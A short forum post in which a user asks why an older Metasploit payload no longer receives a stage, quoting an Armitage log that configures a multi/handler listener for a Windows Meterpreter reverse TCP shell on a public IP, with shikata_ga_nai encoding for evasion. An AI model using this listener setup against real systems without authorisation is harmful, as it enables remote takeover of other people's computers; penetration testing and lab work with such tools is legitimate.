Jump to content

Rtg456

Members
  • Posts

    1
  • Joined

  • Last visited

Posts posted by Rtg456

  1. Hello.
    I was messing around with metasploit. Im using Armitage.

    Everything worked fine before. I created a new payload and the old one stopped getting a stage. It just hangs at Starting the payload handler... The new one works fine. Need help fixing it please.

    Here's the Armitage log:

     

    msf > use exploit/multi/handler

    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

    PAYLOAD => windows/meterpreter/reverse_tcp

    msf exploit(handler) > set LHOST  PUBLIC IP

    LHOST => PUBLIC IP

    msf exploit(handler) > set LPORT 4443

    LPORT => 4443

    msf exploit(handler) > set Encoder x86/shikata_ga_nai

    Encoder => x86/shikata_ga_nai

    msf exploit(handler) > set EXITFUNC process

    EXITFUNC => process

    msf exploit(handler) > set ExitOnSession false

    ExitOnSession => false

    msf exploit(handler) > set Iterations 3

    Iterations => 3

    msf exploit(handler) > exploit -j

    [*] Exploit running as background job.

    [*] Started reverse TCP handler on PUBLIC IP:4443

    [*] Starting the payload handler...

×
×
  • Create New...